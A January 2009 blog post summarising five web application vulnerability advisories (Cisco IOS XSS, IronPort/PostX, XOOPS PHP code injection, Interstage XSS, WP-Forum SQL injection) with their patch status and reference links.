Top Five Web Application Vulnerabilities 1/05/09 -1/19/09 - Top Web Vulnerabilities -
Top Web Vulnerabilities » Top Five Web Application Vulnerabilities 1/05/09 -1/19/09
Top Five Web Application Vulnerabilities 1/05/09 -1/19/09

1) Cisco IOS HTTP Server Multiple Cross-Site Scripting Vulnerabilities

Cisco IOS HTTP server is susceptible to multiple instances of Cross-Site Scripting. These vulnerabilities can be exploited to execute code in the browser of an unsuspecting user and steal cookie-based authentication credentials. Patches which address these issues have been released. Contact the vendor for additional information.

http://www.securityfocus.com/bid/33260

2) Cisco IronPort Encryption Appliance and PostX Multiple Remote Vulnerabilities

Cisco IronPort Encryption Appliance and PostX are susceptible to multiple remote vulnerabilities including information disclosure and cross-site request forgery. An attacker could leverage these issues to steal passwords or modify user information through the web administration interface.  Updates which resolve these issues are available. Contact the vendor for further details.

http://www.securityfocus.com/bid/33268/

3) XOOPS 'mydirname' Parameter Multiple PHP Code Injection Vulnerabilities

XOOPS is susceptible to multiple PHP code injection vulnerabilities which would allow an attacker to inject and execute arbitrary PHP code in context of the web server process. Successful exploitation could lead to a  compromise of the application and underlying system.  Fixes have not yet been released. Contact the vendor for more details.

http://www.securityfocus.com/bid/33176

4)  Interstage HTTP Server mod_proxy_ftp Cross-Site Scripting

Interstage HTTP Server is susceptible to a Cross-Site Scripting vulnerability. An attacker can leverage this issue to execute script code in the browsers of unsuspecting users in context of the affected application, possibly leading to theft of authentication credentials and other attacks.   An advisory which addresses this issue has been released. Contact the vendor for more information.

http://secunia.com/advisories/33428/

5) WordPress Plugin WP-Forum 'forum_feed.php' SQL Injection Vulnerability

WordPress plugin WP-Forum is susceptible to a SQL Injection vulnerability. SQL Injection can allow an attacker full access to a backend database, and in certain circumstances can be utilized to take complete control of a system. A fix has not yet been released. Contact the vendor for further details.

http://www.securityfocus.com/bid/33223

Posted 01-20-2009 8:57 PM by mark.painter
Privacy Statement
Powered by Community Server (Non-Commercial Edition), by Telligent Systems